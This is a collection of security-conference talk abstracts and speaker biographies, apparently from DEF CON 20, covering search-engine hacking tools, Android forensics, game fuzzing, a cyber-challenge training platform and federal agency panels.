Francis Brown Managing Partner - Stach & Liu, LLC
Rob Ragan Senior Security Associate - Stach & Liu, LLC
All brand new tool additions to the Google Hacking Diggity Project - The Next Generation Search Engine Hacking Arsenal. As always, all tools are free for download and use.
When last we saw our heroes, the Diggity Duo had demonstrated how search
engine hacking could be used to take over someone’s Amazon cloud in less than 30 seconds, build
out an attack profile of the Chinese government’s external networks, and even download all of
an organization’s Internet facing documents and mine them for passwords and secrets. Google and
Bing were forced to hug it out, as their services were seamlessly combined to identify which
of the most popular websites on the Internet were unwittingly being used as malware distribution
platforms against their own end-users.
Now, we've traveled through space and time, my friend, to rock this house again...
True to form, the legendary duo have toiled night and day in the studio (a one room apartment
with no air conditioning) to bring you an entirely new search engine hacking tool arsenal that’s
packed with so much tiger blood and awesome-sauce, that it’s banned on 6 continents. Many of these
new Diggity tools are also fueled by the power of the cloud and provide you with vulnerability data
faster and easier than ever thanks to the convenience of mobile applications.Just a few highlights
of new tools to be unveiled are:
* AlertDiggityDB – For several years, we’ve collected vulnerability details and sensitive information
disclosures from thousands of real-time RSS feeds setup to monitor Google, Bing, SHODAN, and various
other search engines. We consolidated this information into a single database, the AlertDiggityDB,
forming the largest consolidated repository of live vulnerabilities on the Internet. Now it’s available to you.
* Diggity Dashboard – An executive dashboard of all of our vulnerability data collected from search
engines. Customize charts and graphs to create tailored views of the data, giving you the insight
necessary to secure your own systems. This web portal provides users with direct access to the most
current version of the AlertDiggityDB.
* Bing Hacking Database (BHDB) 2.0 – Exploiting recent API changes and undocumented features within
Bing, we’ve been able to completely overcome the previous Bing hacking limitations to create an
entirely new BHDB that will make Bing hacking just as effective as Google hacking (if not more so)
for uncovering vulnerabilities and data leaks on the web. This also will include an entirely
new SharePoint Bing Hacking database, containing attack strings targeting Microsoft SharePoint
deployments via Bing.
* NotInMyBackYardDiggity – Don’t be the last to know if LulzSec or Anonymous post data dumps of your
company’s passwords on PasteBin.com, or if a reckless employee shares an Excel spreadsheet with all
of your customer data on a public website. This tool leverages both Google and Bing, and comes with
pre-built queries that make it easy for users to find sensitive data leaks related to their organizations
that exist on 3rd party sites, such as PasteBin, YouTube, and Twitter. Uncover data leaks in documents
on popular cloud storage sites like Dropbox, Microsoft SkyDrive, and Google Docs. A must have for
organizations that have sensitive data leaks on domains they don’t control or operate.
* PortScanDiggity – How would you like to get Google to do your port scanning for you? Using undocumented
functionality within Google, we’ve been able to turn Google into an extremely effective network port s
canning tool. You can provide domains, hostnames, and even IP address ranges to scan in order to identify
open ports ranging across all 65,535 TCP ports. An additional benefit is that this port scanning is
completely passive – no need to directly communicate with target networks since Google has already
performed the scanning for you.
* CloudDiggity Data Mining Tool Suite – Ever wanted to data mine every single password, email, SSN,
credit card number on the Internet? Our new cloud tools combine Google/Bing hacking and data loss
prevention (DLP) scanning on a massive scale, made possible via the power of cloud computing.
Chuck Norris approved.
* CodeSearchDiggity-Cloud Edition – Google recently shut down Code Search in favor of focusing on Google+,
putting “more wood behind fewer arrows”. I suppose we could have let the matter go, and let CodeSearchDiggity
die, but that would be the mature thing to do. Instead, we are harnessing the power of the cloud to keep the
dream alive – i.e. performing source code security analysis of nearly every single open source code project
in existence, simultaneously.
* BingBinaryMalwareSearch (BBMS) – According to the Verizon 2012 DBIR, malware was used to compromise a
staggering 95% of all records breached for 2011. BBMS allows users to proactively track down and block
sites distributing malware executables on the web. The tool leverages Bing, which indexes executable
files, to find malware based on executable file signatures (e.g. “Time Stamp Date:”, “Size of Code:”,
and “Entry Point:”).
* Diggity IDS – Redesigned intrusion detection system (IDS) for search engine hacking. Will still
leverage the wealth of information provided by the various Diggity Alert RSS feeds, but will also
make more granular data slicing and dicing possible through new and improved client tools. Also
includes the frequently requested SMS/email alerting capabilities, making it easier than ever for
users to keep tabs on their vulnerability exposure via search engines.
So come ready to engage us as we explore these tools and more in this DEMO rich presentation.
You are cordially invited to ride the lightning.
Francis Brown CISA, CISSP, MCSE, is a Managing Partner
at Stach & Liu, a security consulting firm providing IT security services to the Fortune 500
and global financial institutions as well as U.S. and foreign governments. Before joining
Stach & Liu, Francis served as an IT Security Specialist with the Global Risk Assessment
team of Honeywell International where he performed network and application penetration
testing, product security evaluations, incident response, and risk assessments of critical
infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced
Security Centers and conducted network, application, wireless, and remote access penetration
tests for Fortune 500 clients.
Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, InfoSec
World, ToorCon, and HackCon and has been cited in numerous industry and academic publications.
Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major
in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught
operating system implementation, C programming, and participated in DARPA-funded research
into advanced intrusion prevention system techniques.
Facebook: StachLiu
Rob Ragan is a Senior Security Associate at
Stach & Liu, a specialized security consulting firm serving the Fortune 1000 and
high-tech startups. We protect our clients from the bad guys by breaking-in and bending
the rules before the hackers do. From critical infrastructure to credit cards, popular
websites to mobile games, and flight navigation systems to frozen waffle factories, we're there.
Before joining Stach & Liu, Rob served as a Software Engineer with the Application
Security Center team of Hewlett-Packard (formerly SPI Dynamics) where he developed automated
web application security testing tools, performed penetration tests, and researched vulnerabi
lity assessment and identification techniques. Rob has presented his research at leading
conferences such as Black Hat, DEF CON, SummerCon, InfoSec World, HackCon, OuterZ0ne, and
HackerHalted. He has published several white papers and is a contributing author to the Hacking Exposed:
Web Applications 3rd edition.
Twitter: @sweepthatleg
Facebook: StachLiu
Project
KinectasploitV2: Kinect Meets 20 Security Tools
Jeff
Bryner p0wnlabs/0wner
Last year saw the release of Kinectasploit v1 linking the Kinect with Metasploit in a
3D, first person shooter environment. What if we expanded Kinectasploit to use 20 security tools
in honor of DEF CON's 20th anniversary?!
Jeff Bryner Jeff has toiled for over 20 years integrating systems, performing
incident response and forensics and ultimately fixing security issues. He writes for the SANS forensic blog,
has spoken at RSA on SCADA security issues, DEF CON 18 on privacy issues with the
google toolbar, released kinectasploit v1 at DEF CON 19 and runs p0wnlabs.com
just for fun.
Twitter: @p0wnlabs
p0wnlabs.com
Fuzzing Online Games
Elie Bursztein Researcher, Google
Patrick Samy Research Engineer, Stanford University
Patrick Samy Research Engineer, Stanford University
Fuzzing online games to find interesting bugs requires a unique set of novel techniques.
In a nutshell the lack of direct access to the game server and having to deal with clients that are far too complex to be
easily emulated force us to rely on injecting fuzzing data into a legitimate connections rather than use the standard
replay execution approach. Top that with heavily encrypted and complex network protocols and you start to see why we
had to become creative to succeed :)
In this talk, we will discuss and illustrate the novels techniques we had to develop to be able to fuzz online games,
including how to successfully inject data into a gaming sessions and how to instrument the game memory to know that our
fuzzing was successful. We will also tell you how to find and reverse the interesting part of the protocol, and how to
decide when to perform the injection.
Elie Bursztein is a researcher at Google's Mountain View, Calif.
headquarters, where he invents ways to fix the Internet's security and privacy problems. Prior to that as a
researcher at Stanford University, Elie designed Wikipedia's CAPTCHA and created Talisman, a Chrome browser
extension that enhances security. He is also the inventor of the award-winning game hacking tool Kartograph
presented at DEF CON 18 and Security and Privacy 2011.
Twitter: @elie
http://elie.im
Patrick Samy is research engineer at Stanford university where he focuses
on hardware and system security. He is the lead developer of Kartograph network and scripting engine. He also
developed the Kartograph real-time visualization engine.
The Open Cyber Challenge Platform
Linda C. Butler
Everyone from MIT to the DoD have agreed that teaching cyber security using
cyber challenges, where groups of students attack or defend a live network, has proven to be an
incredibly effective educational tactic. Unfortunately, current cyber challenge tools also suffer from
being very hard to configure, and/or very expensive, and/or limited to certain audiences (e.g.
the military), which makes them inaccessible to high schools, colleges, and smaller organizations.
The Open Cyber Challenge Platform aims to help fix this by providing a free, open-source, cyber
challenge software platform that is reasonable in terms of cost of required hardware and required
technical installation/maintenance expertise, as well as easily extensible to allow the vast open
source community to provide additional modules that reflect new challenges and scenarios. If you're
interested in the future of cyber-security education, or simply just want to learn about a new
potential training tool, come check out the OCCP.
Linda C. Butler is a computer science student currently
interning at the University of Rhode Island's Digital Forensics and Cyber Security Program. Past activities
include an internship in the NASA Engineering department at Kennedy Space Center, a backpacking trip through
New Zealand, and performing at a renaissance faire. She's an OWASP member and past DEFCON Attendee, and finds
the interaction between security, privacy, and society an endlessly fascinating area of study.
Into the Droid: Gaining Access to Android User Data
Thomas Cannon Director of Research and Development, viaForensics
This talk details a selection of techniques for getting the data out of an Android device in order to
perform forensic analysis. It covers cracking lockscreen passwords, creating custom forensic ramdisks, bypassing bootloader
protections and stealth real-time data acquisition. We’ll even cover some crazy techniques - they may get you that crucial
data when nothing else will work, or they may destroy the evidence!
Forensic practitioners are well acquainted with push-button forensics software. They are an essential tool to keep on top of
high case loads – plug in the device and it pulls out the data. Gaining access to that data is a constant challenge against
sophisticated protection being built into modern smartphones. Combined with the diversity of firmware and hardware on the
Android platform it is not uncommon to require some manual methods and advanced tools to get the data you need.
This talk will reveal some of the techniques forensic software uses behind the scenes, and will give some insight
into what methods and processes blackhats and law enforcement have at their disposal to get at your data. Free and
Open Source tools will be released along with this talk to help you experiment with the techniques discussed.
Note that this talk does not discuss Android analysis basics such as how to use ADB or what the SDK is - it is assumed
you know these or can easily look them up afterwards.
Thomas Cannon is the Director of Research and Development for
viaForensics, a Chicago based digital forensics and security company. Thomas spends the majority of his
time researching new mobile security, malware and forensics techniques and getting them into the hands of
customers for commercial, research or military application. He conducts penetration testing and code
analysis of mobile applications for clients in industries such as banking/finance and retail.
Thomas is known for his research on Android having published advisories for new vulnerabilities and demonstrated
attacks on the platform as well as providing some early guides on reverse engineering Android applications. Thomas
has spoken at international conferences and presented to law enforcement on the topic of mobile forensics. Thomas
has had a number of articles published in industry magazines and also been interviewed on national news programmes
regarding vulnerabilities in payment systems and mobile technology.
Twitter: @thomas_cannon
https://viaforensics.com
http://thomascannon.net
Panel: Meet the Feds 1 - Law Enforcement
Panelists
Jim Christy Moderator, DC3
Leon Carroll Ex-NCIS
Andy Fried Ex-IRS
Jon Iadonisi Ex-Navy Seal
Rich Marshall NSA
David McCallum TV-NCIS
Justin Wykes NW3C
Did you ever wonder if the Feds were telling you’re the truth
when you asked a question? Join current and former federal agents from numerous agencies
to discuss cyber investigations and answer your burning questions. Enjoy the
opportunity to grill ‘em and get down to the bottom of things!
Agencies that will have representatives include: Defense Cyber Crime Center (DC3),
National White Collar Crime Center (NWC3), US Department of Treasury, Internal R
evenue Service (IRS), and the US Navy SEALs. This year, the “Meet the Feds” panel
has gone Hollywood with special guests - Mr. David McCallum and Mr. Leon Carroll
from CBS’s NCIS!
Each of the agency reps will make an opening statement regarding their agencies
role, and then open it up to the audience for questions.
Jim Christy is a retired special agent that has
specialized in cyber crime investigations and digital forensics for over 26 years with the Air Force
Office of Special Investigation and over 40 years of federal service. Jim returned to the federal government
first as an IPA and now as an HQE and is the Director of Futures Exploration (FX) for the Department of
Defense Cyber Crime Center (DC3). FX the DC3 innovation incubator is responsible for outreach/marketing,
and strategic relationships with other government organizations, private sector, and academia for DC3. He
was profiled in Wired Magazine in January 2007.
Jim consulted with David Marconi (writer of Enemy of the State, Mission Impossible 2 & Live Free or Die Hard) and
contributed technical advice on critical infrastructure attacks used in the movie Live Free or Die Hard.
In May 2011, the Air Force graduated the first NCO’s for a new AF career field, Cyber Defense Operations at Keesler
AFB, MS. The staff of the course honored Jim by presenting the top graduate of the class with the “Jim Christy Award”.
In 2006, Christy created the DC3 Digital Forensics Challenge an international competition that in 2011 had 1,800
participants spanning all 50 states and 53 countries. The exercises are designed to develop, hone, and engage
participants in the fields of cyber investigation, digital forensics, and cyber security. It is one of the first
venues to employ crowd sourcing in “real world” mission focused solution development.
In Oct 2003, the Association of Information Technology Professionals awarded Jim the 2003 Distinguished Information
Science Award winner for his outstanding contribution through distinguished services in the field of information
management. Previous recipients of this prestigious award include Admiral Grace Hopper, Gene Amdahl, H. Ross Perot,
General Emmett Paige, Bill Gates, Lawrence Ellison, David Packard and Mitch Kapor.
From 17 Sep 01 – 1 Nov 03, Jim was the Deputy Director/Director of Operations, Defense Computer Forensics Lab, DC3.
As the Dir of Ops for the DCFL he managed four sections with over 40 computer forensic examiners that supported Major
Crimes & Safety, Counterintelligence and Counterterrorism, as well as Intrusions and Information Assurance cases for
the Department of Defense.
Leon Carroll grew up in Chicago and graduated from North Dakota State University
(where he played on college Division II National Championship football teams). He served 6 years
in the Marines and then continued in the Marine Reserves in Long Beach (under the command of
PV Sunset member Lt Col Jacques Naviaux).
Carroll was a member of the U.S. Marine Corps when he joined NCIS in 1980. Leon worked at a halfway house for pre-release
felons in Fargo, North Dakota, and then became a special agent with the Naval Investigative Service, later known as the
Naval Criminal Investigative Service (NCIS), serving in several places including Panama and aboard the USS Ranger.
He retired two decades later, but returned after 9/11, serving another year and a half to help with the agency's expanded
role in counter-terrorism. After his second retirement, he and his wife moved to the Los Angeles area.
As a retired NCIS agent with over 20 years of experience, Mr. Carroll received an unexpected opportunity to work as a
technical adviser to the NCIS TV program in Los Angeles. He was recruited in 2003 by the producers who said they
needed someone who could provide the show with the “spit-polish shine of authenticity.”
Working on both NCIS and NCIS Los Angeles, Mr. Carroll is a technical adviser to the script writers,
actors and director, and has also written scripts for a few episodes himself. He works under the leadership
of Mark Hyman of football fame. They do 24 episodes per season.
Andy Fried is a Senior Consultant with Cutter Consortium's Business Technology Strategies and
Government & Public Sector practices. His unique skill set has earned him a worldwide reputation; his background
includes working as a uniformed police officer, a computer programmer and security analyst, and a Senior Special Agent
with the US Department of the Treasury, a post he retired from after a 20-year career. Mr. Fried's extensive knowledge
allows him to identify large data sources that are seemingly unrelated and combine them to produce findings that would
not be otherwise identified. His passion and tenacity for identifying and stopping Internet criminal activity has earned
him the respect of leading industry experts. During his last two years at the US Treasury, Mr. Fried was credited with
identifying and mitigating over 3,000 fraudulent online schemes. He currently works as a security researcher for a
nonprofit organization involved in identifying organized criminal enterprises responsible for fraudulent schemes,
denial-of-service attacks, malware propagation, and large-scale botnets. Mr. Fried's work routinely involves data
mining and analysis of data sets that contain hundreds of millions of records.
Early in his career, Mr. Fried was a programmer for Bionetics, a life sciences medical research group at the Kennedy
Space Center, where he became a technology evangelist, identifying work processes that could be automated, conducting
R&D for new computer hardware and software programs, and assisting biostatisticians in aggregating and processing
the voluminous research data generated by data acquisition systems. At Bionetics, Mr. Fried was tasked with providing
technical support to NASA's Internal Security Office, including one high-profile case involving the arrest and
investigation of a kidnapper/rapist. At NASA's suggestion, he moved from Bionetics into a computer security analyst
position within the newly formed Lockheed Space Operations Corporation (LSOC). He soon became involved in processing
and analyzing digital data related to the kidnapping/rape investigation and developed a suite of forensic software
programs. His software became the first set of programs designed specifically for use by law enforcement and was
adopted by the FBI, IRS, and Air Force Office of Special Investigations. Soon after, the IRS recruited Mr. Fried
for a Special Agent position, citing a need to develop the capability to detect, investigate, and prosecute
computer-related crimes. He went on to help establish the Criminal Investigation Division's Computer Investigative
Specialist (CIS) program, a similar program for IRS Inspection, the System Intrusion and Network Attack Response
Team (SINART), and the Computer Security Incident Response Capability (CSIRC).
More recently, Mr. Fried developed databases and innovative techniques to proactively detect online schemes
targeting the IRS. He identified various sources of intelligence and information, developed strategic alliances
with private organizations, and designed automated systems to obtain and analyze large data sets for the purpose
of identifying and mitigating online schemes. Mr. Fried also designed, developed, and implemented his agency's
network-based digital video surveillance system. He additionally developed strategic alliances with a large number
of domain registrars, ISPs, government- sponsored CERTs, and private organizations involved in various forms of network
security for the purpose of increasing the ability to mitigate fraudulent behavior as quickly as possible. In 2008,
Mr. Fried presented a proposal to IRS management to form a new division whose sole mission was to monitor, detect,
and mitigate online fraudulent schemes targeting the IRS and US taxpayers. The proposal was adopted and led to the
formation of IRS Online Fraud Detection and Prevention (OFDP).
Mr. Fried is on the executive board of directors of the Fraternal Order of Police in Washington, DC,
and is affiliated with several security organizations that cannot be named. He is a frequent presenter
at Black Hat and DEF CON. Mr. Fried has a BS degree in criminology.
Jon Iadonisi is the founder of White Canvas Group – a company that specializes
in cultivating alternative and disruptive strategies. His depth of experience, diversified expertise,
and unique operational background has provided a perspective that has enabled him to contribute to
solving national security problems. He has spent the past fifteen years using innovative computing
technologies coupled with cutting edge scholarship to solve complex problems, some of which later
became implemented as new strategies and capabilities for the U.S. Government. He is regularly sought
by the Department of Defense, various Intelligence agencies, and members of the US Congress to provide
expert opinion and briefings on information age unconventional warfare. Prior to joining the private
sector, Jon served as a Navy SEAL, where he designed, planned and led various combat operations that
integrated innovative technologies and tactics into the operating environment, ultimately creating
new capabilities for the Special Operations Community and Central Intelligence Agency. He is a
combat-wounded and decorated veteran who earned a B.S. in Computer Science from the US Naval
Academy, and M.S. in Homeland Security from San Diego State University. He is a member of the
Council on Foreign Relations and guest lectures at San Diego State University and Georgetown
Law School. He is an academic and athletic all American who participated in the 2000 Olympic
Rifle team trials. He enjoys fine wine, good books, music, and outdoors activities.
Rich Marshall is the Founder and President of X-SES Consultants, LLC, the former
Vice President of Cyber Programs at Triton FSI and is a nationally and internationally recognized
thought leader on cyber related issues. He provides an impressive professional network and is known
for facilitating the establishment of programs and contracts. He has extensive leadership experience
in formulating growth strategies, integrating policy, culture and training with technology issues,
building relationships and delivering lasting results. He is also a strategic thinker who knows how
to lead and very importantly, knows where to lead.
He previously was a member of the Senior Cryptologic Executive Service (SCES) and the Defense Intelligence
Senior Executive Service (DISES). Prior to joining Triton FSI, he was the Director of Global Cyber Security
Management, National Cyber Security Division, Department of Homeland Security (DHS) by special arrangement
between the Director, National Security Agency (DIRNSA) and the Secretary of DHS. Within DHS he directed
National Cyber Security Education Strategy; and the Software Assurance; Research and Standards Integration;
and Supply Chain Risk Management programs.
Mr. Marshall was previously the Senior Information Assurance (IA) Representative, Office of Legislative
Affairs at the National Security Agency (NSA) where he served as the Agency's point of contact for all NSA
Information Security (INFOSEC) matters concerning Congress. He devised the IA legislative strategy, helped
shape the passage of the revised Foreign Intelligence Surveillance Act and was the Comprehensive National
Cyber Security Initiative (CNCI).
In 2001, Mr. Marshall was selected by the Cyber Advisor to the President to serve as the Principal Deputy Director,
Critical Infrastructure Assurance Office (CIAO), where he led a team of 40 dedicated professionals in developing,
coordinating and implementing the Administration's National Security for Critical Infrastructure Protection initiative
and the National Cyber Security Strategy to address potential threats to the nation's critical infrastructures.
From 1994 to 2001, Mr. Marshall served with distinction as the Associate General Counsel for Information Systems
Security/Information Assurance, Office of the General Counsel, National Security Agency. In that capacity, Mr.
Marshall provided advice and counsel on national security telecommunications and technology transfer policies
and programs, national security telecommunications technical security programs, the National Information
Assurance Partnership, the Common Criteria Mutual Recognition Arrangement, legislative initiatives and
international law. Mr. Marshall was the legal architect for the Joint Chiefs of Staff directed exercise "Eligible
Receiver 97" that spotlighted many of the cyber-vulnerabilities of our nation's critical infrastructures and helped
bring focus on this issue at the national leadership level.
Mr. Marshall graduated from The Citadel with a B.A. in Political Science; Creighton University School of Law with
a J.D. in Jurisprudence; Georgetown School of Law with an LL.M. in International and Comparative Law; was a Fellow
at the National Security Law Institute, University of Virginia School of Law in National Security Law; attended
the Harvard School of Law Summer Program for Lawyers; the Georgetown University Government Affairs Institute on
Advanced Legislative Strategies and participated in the Information Society Project at Yale Law School and in the
Privacy, Security and Technology in the 21st Century program at Georgetown University School of Law.
David McCallum:
Born David Keith McCallum, Jr. in Glasgow, Scotland on Sept. 19, 1933, he was the son of David McCallum, Sr.,
the famed principal violinist for numerous orchestras in the United Kingdom, including the Royal Philharmonic
Orchestra, and cellist Dorothy Dorman. After studying at the Royal Academy of Dramatic Arts, he made his debut
in a 1946 BBC Radio production of "Whom the Gods Love, Die Young." Bit and supporting roles in British features
and on television soon followed, often as troubled youth, as benefitting his brooding intensity. Among his more
notable turns during his period was in 1958's "Violent Playground," where his psychotic gang member is spurred
by poverty and rock and roll to take a classroom of school children hostage.
McCallum's American film debut came as the mother-fixated Carl von Schlosser in John Huston's "Freud" (1962),
with Montgomery Clift as the pioneering analyst. The following year, he played Royal Navy Officer Ashley-Pitt,
who devised the method of dispersing the dirt from tunnels dug under a POW camp in "The Great Escape" (1963).
An early American television appearance on "The Outer Limits" (CBS, 1963-65) became one of his most enduring,
thanks to the eye-popping makeup applied to McCallum. His character, a bitter Welsh miner, agreed to take part
in an evolutionary experiment, which turned him into a hyper-intelligent mutant with a massive domed cranium.
The image was memorable enough to make McCallum a go-to for numerous science fiction efforts in the ensuing decades.
In 1964, McCallum was cast as Illya Kuryakin, a minor character on the spy series "The Man from U.N.C.L.E."
Despite having only two lines, the producers saw that McCallum and star Robert Vaughn had considerable chemistry
together, and boosted the character to co-star status. The move changed McCallum's career forever. Kuryakin's cool
demeanor, physical proficiency with any weapon, and passion for art, music and science - not to mention his wealth
of blonde hair - made him an immediate favorite among female viewers, whose fan mail to the actor was the most
ever received in the history of MGM, which produced the show. For the series' three years on the air, McCallum
was at the apex of television stardom, and netted two Emmy nominations and a Golden Globe nod, as well as major
roles in several films. He was the tormented Judas in George Stevens' epic Biblical drama "The Greatest Story
Ever Told" (1965), and took the lead in a number of minor features, including 1968's "Sol Madrid" and "Mosquito
Squadron" (1969), many of which traded on McCallum's popularity in "U.N.C.L.E." by casting him in action-oriented
roles. During this period, McCallum also orchestrated and conducted a trio of lush, sonically adventurous records
that put unique spins on some of the period's more popular songs.
In the 1970s, McCallum was a fixture on television in both America and England. In the
States, he was a staple of science fiction and supernaturally-themed TV features, including "Hauser's Memory"
(NBC, 1970), as a scientist who injected himself with a dying colleagues brain fluid to preserve defense secrets
from foreign agents, while "She Waits" (CBS, 1972) cast him as the husband to a possessed Patty Duke. He also
briefly returned to series work with "The Invisible Man" (NBC, 1975-76) as a scientist who used his invisibility
formula to aid a government agency against evildoers. His work in England hewed more towards dramatic fare:
in "Colditz" (BBC, 1972-74), he was an aggressive RAF officer who put aside his anger towards the Nazis to help
organize an escape from a notorious German war prison, while in "Sapphire & Steel" (ITV, 1979- 1982), he and Joanna
Lumley played extraterrestrial operatives who investigated strange incidents involving the time-space continuum.
In 1983, he reunited with Robert Vaughn for "The Return of the Man from U.N.C.L.E." (CBS), which saw Illya retired
from espionage to design women's clothing in New York. The escape of a top enemy spy brings both U.N.C.L.E. men
back into action, albeit with other, younger agents. The TV- movie was intended as the pilot for a new version
of the series, but the show was never greenlit.
After logging time on countless, unmemorable series like "Team Knight Rider" (syndicated, 1997-98) and "The
Education of Max Bickford" (CBS, 2001-02), McCallum found his next hit with "NCIS," a police procedural drama
about Navy investigators. McCallum played Chief Medical Examiner Donald "Ducky" Mallard, an eccentric but highly
efficient investigator with a knack for psychological profiling. A close confidante to Mark Harmon's Jethro Gibbs,
he served as father confessor and paternal figure for the show's offbeat cast of characters. The show's slow-building
popularity brought McCallum back to a television audience made up in part of the children of viewers who sent him fan
letters back in the "U.N.C.L.E." days, granting him a rare burst of second stardom.
Justin Wykes joined the National White Collar Crime Center in December 2006 as a Computer
Crime Specialist. He is currently responsible for the development and updating of the "Basic Cell Phone
Investigations" course as well as instructing multiple basic and advanced level courses.
He has ten years experience building, fixing and repairing computers, and earned his A+ certification in
September of 2006. After earning a Bachelor of Science degree from Grand Valley State University in
Criminal Justice, with an emphasis in Law Enforcement, Mr. Wykes spent five years as a Special Agent
for US Army Counterintelligence. The last two of those years were spent as a computer forensic examiner
for the Cyber Counterintelligence Activity. As a Special Agent for CCA, Mr. Wykes conducted
multi-agency investigations in security compromises, espionage, and terrorism.
Meet the Feds 2 - Policy
Panelists:
Jim Christy Moderator, DC3
Rich Marshall NSA
Rod Beckstrom Ex-DHS
Jerry Dixon Ex-DHS
Mishel Kwon EX-USCERT
Riley Repko VT
Dr. Linton Wells NDU
Mark Weatherford DHS
Marcus Sachs Ex-WHS
Robert E. JoyceNSA
Jim Christy Moderator, DC3
Rich Marshall NSA
Rod Beckstrom Ex-DHS
Jerry Dixon Ex-DHS
Mishel Kwon EX-USCERT
Riley Repko VT
Dr. Linton Wells NDU
Mark Weatherford DHS
Marcus Sachs Ex-WHS
Robert E. JoyceNSA
Did you ever wonder if the Feds were telling you’re the truth
when you asked a question? Join current and former federal agents from numerous
agencies to discuss cyber policy and answer your burning questions. Enjoy the
opportunity to grill ‘em and get down to the bottom of things!
Agencies that will have representatives include: Defense Cyber Crime Center (DC3),
Department of Homeland Security (DHS), United States Computer Emergency Readiness
Team (US CERT), Office of the Secretary of Defense Networks and Information
Integration (OSD/NII), National Security Agency (NSA), National Defense
University (NDU), and Virginia Tech.
Each of the agency reps will make an opening statement regarding their
agencies role, and then open it up to the audience for questions.
Jim Christy is a retired special agent that has
specialized in cyber crime investigations and digital forensics for over 26 years with the Air Force
Office of Special Investigation and over 40 years of federal service. Jim returned to the federal government
first as an IPA and now as an HQE and is the Director of Futures Exploration (FX) for the Department of
Defense Cyber Crime Center (DC3). FX the DC3 innovation incubator is responsible for outreach/marketing,
and strategic relationships with other government organizations, private sector, and academia for DC3. He
was profiled in Wired Magazine in January 2007.
Jim consulted with David Marconi (writer of Enemy of the State, Mission Impossible 2 & Live Free or Die Hard) and
contributed technical advice on critical infrastructure attacks used in the movie Live Free or Die Hard.
In May 2011, the Air Force graduated the first NCO’s for a new AF career field, Cyber Defense Operations at Keesler
AFB, MS. The staff of the course honored Jim by presenting the top graduate of the class with the “Jim Christy Award”.
In 2006, Christy created the DC3 Digital Forensics Challenge an international competition that in 2011 had 1,800
participants spanning all 50 states and 53 countries. The exercises are designed to develop, hone, and engage
participants in the fields of cyber investigation, digital forensics, and cyber security. It is one of the first
venues to employ crowd sourcing in “real world” mission focused solution development.
In Oct 2003, the Association of Information Technology Professionals awarded Jim the 2003 Distinguished Information
Science Award winner for his outstanding contribution through distinguished services in the field of information
management. Previous recipients of this prestigious award include Admiral Grace Hopper, Gene Amdahl, H. Ross Perot,
General Emmett Paige, Bill Gates, Lawrence Ellison, David Packard and Mitch Kapor.
From 17 Sep 01 – 1 Nov 03, Jim was the Deputy Director/Director of Operations, Defense Computer Forensics Lab, DC3.
As the Dir of Ops for the DCFL he managed four sections with over 40 computer forensic examiners that supported Major
Crimes & Safety, Counterintelligence and Counterterrorism, as well as Intrusions and Information Assurance cases for
the Department of Defense.
Rod Beckstrom is a highly successful entrepreneur, founder and CEO of a publicly-traded company, a
best-selling author, avowed environmentalist, public diplomacy leader and, most recently, the head of a top-level
federal government agency entrusted with protecting the nation’s communication networks against cyber attack.
Throughout 2008, Rod served as the Director of the National Cybersecurity Center (NCSC) at the U.S. Department of
Homeland Security, where he reported to the Secretary of DHS, and was charged with cooperating directly with the
Attorney General, National Security Council, Secretary of Defense, and the Director of National Intelligence (DNI).
Prior to joining DHS, he served on the DNI’s Senior Advisory Group. Rod is unique in having experienced the inner
workings of two, highly-charged, often competing, federal security agencies created in the wake of the September
11th attacks, an event that he says, “changed my life.”
Rod is widely regarded as a pre-eminent thinker and speaker on issues of cybersecurity and related global issues,
as well as on organizational strategy and leadership. He is also an expert on how carbon markets and “green” issues
affect business. While Director of the NCSC, Rod developed an effective working group of leaders from the nation's
top six cybersecurity centers across the civilian, military and intelligence communities. His work led to his
development of a new economic theory that provides an explicit model for valuing any network, answering a
decades-old problem in economics.
Rod co-authored four books including The Starfish and the Spider: The Unstoppable Power of Leaderless Organizations,
a best-selling model for analyzing organizations, leadership styles, and competitive strategy. The Starfish and the
Spider has been translated into 16 foreign editions and is broadly quoted.
At age 24, Rod started his first company in a garage apartment and, subsequently, grew it into a global enterprise
with offices in New York, London, Tokyo, Geneva, Sydney, Palo Alto, Los Angeles, and Hong Kong. CATS Software Inc.,
went public and later sold. Nobel Laureates Myron Scholes and William F. Sharpe served on the company's boards of
directors and advisors. While at CATS Rod helped advance the financial theory of “value at risk,” now used globally
for all key banking risk management. Rod co- edited the first book to introduce “value at risk.” Rod also
co-founded Mergent Systems, a pioneer in inferential database engines, which Commerce One later acquired for $200
million. He has co-launched other collaborations, software, and internet service businesses, as well. From 1999 to
2001, he served as Chairman of Privada, Inc, a leader in technology enabling private, anonymous, and secure credit
card transactions over the internet.
In 2003, Rod co-founded a global peace network of CEO's which initiated Track II diplomatic efforts between India
and Pakistan. The group’s symbolic actions opened the borders to people and trade, and contributed to ending the
most recent Indo-Pak conflict. It's one of several non-profit groups and initiatives Rod has started. He now serves
on the boards of the Environmental Defense Fund, which Fortune Magazine ranked as one of the seven most powerful
boards in the world and Jamii Bora Trust an innovative micro-lending group in Africa with more than 200,000 members.
He is a graduate of Stanford University with an MBA and a BA with Honors and Distinction. He served as Chairman
of the Council of Presidents of the combined Stanford student body (ASSU) and was a Fulbright Scholar at the
University of St. Gallen in Switzerland.
Rich Marshall is the Founder and President of X-SES Consultants, LLC, the former
Vice President of Cyber Programs at Triton FSI and is a nationally and internationally recognized
thought leader on cyber related issues. He provides an impressive professional network and is known
for facilitating the establishment of programs and contracts. He has extensive leadership experience
in formulating growth strategies, integrating policy, culture and training with technology issues,
building relationships and delivering lasting results. He is also a strategic thinker who knows how
to lead and very importantly, knows where to lead.
He previously was a member of the Senior Cryptologic Executive Service (SCES) and the Defense Intelligence
Senior Executive Service (DISES). Prior to joining Triton FSI, he was the Director of Global Cyber Security
Management, National Cyber Security Division, Department of Homeland Security (DHS) by special arrangement
between the Director, National Security Agency (DIRNSA) and the Secretary of DHS. Within DHS he directed
National Cyber Security Education Strategy; and the Software Assurance; Research and Standards Integration;
and Supply Chain Risk Management programs.
Mr. Marshall was previously the Senior Information Assurance (IA) Representative, Office of Legislative
Affairs at the National Security Agency (NSA) where he served as the Agency's point of contact for all NSA
Information Security (INFOSEC) matters concerning Congress. He devised the IA legislative strategy, helped
shape the passage of the revised Foreign Intelligence Surveillance Act and was the Comprehensive National
Cyber Security Initiative (CNCI).
In 2001, Mr. Marshall was selected by the Cyber Advisor to the President to serve as the Principal Deputy Director,
